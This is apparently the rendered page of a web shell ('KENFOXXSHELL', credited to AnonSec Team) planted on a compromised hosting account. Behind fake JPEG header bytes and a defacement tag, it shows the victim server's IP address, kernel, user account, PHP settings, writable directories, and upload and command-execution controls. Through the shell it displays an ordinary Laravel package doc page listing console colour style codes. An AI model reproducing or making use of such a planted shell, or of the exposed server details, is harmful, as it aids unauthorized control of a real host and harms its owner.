ÿØÿàJFIFHHÿÛC     ÿÛC  ÿÂ"ÿÄÿÄÿÚ ±5¬€ÿÄàÿÚÿÄÀÿÚ?ÿÄÀÿÚ?ÿÄàÿÚ?ÿÄàÿÚ?!ÿÚ ÿÄÀÿÚ?ÿÄÀÿÚ?ÿÄàÿÚ?ÿÙ Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/domains/bellizeno.com/public_html/vendor/laradic/support/docs/abstraction/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/domains/bellizeno.com/public_html/vendor/laradic/support/docs/abstraction/command.md
<!---
title: Command
subtitle: Abstraction
author: Robin Radic
-->

The command class can be used as base class for your console commands. It extends the default Laravel `Command` class.

### Methods
It provides several utility methods:

- `arrayTable($arr, array $header = [ 'Key', 'Value' ])`
- `dump($dump)` Dumps a value to the console
- `hasRootAccess()` 
- `getLaravel()` Returns the Laravel `Application` instance
- `style($styles, $str)` Make a colored string for output.


#### Styles
`style($styles, $str)` can be used in combination with the following styles:
```php        
$styles = array(
    'none'             => null,
    'bold'             => '1',
    'dark'             => '2',
    'italic'           => '3',
    'underline'        => '4',
    'blink'            => '5',
    'reverse'          => '7',
    'concealed'        => '8',
    'default'          => '39',
    'black'            => '30',
    'red'              => '31',
    'green'            => '32',
    'yellow'           => '33',
    'blue'             => '34',
    'magenta'          => '35',
    'cyan'             => '36',
    'light_gray'       => '37',
    'dark_gray'        => '90',
    'light_red'        => '91',
    'light_green'      => '92',
    'light_yellow'     => '93',
    'light_blue'       => '94',
    'light_magenta'    => '95',
    'light_cyan'       => '96',
    'white'            => '97',
    'bg_default'       => '49',
    'bg_black'         => '40',
    'bg_red'           => '41',
    'bg_green'         => '42',
    'bg_yellow'        => '43',
    'bg_blue'          => '44',
    'bg_magenta'       => '45',
    'bg_cyan'          => '46',
    'bg_light_gray'    => '47',
    'bg_dark_gray'     => '100',
    'bg_light_red'     => '101',
    'bg_light_green'   => '102',
    'bg_light_yellow'  => '103',
    'bg_light_blue'    => '104',
    'bg_light_magenta' => '105',
    'bg_light_cyan'    => '106',
    'bg_white'         => '107'
);
```

Anon7 - 2022
AnonSec Team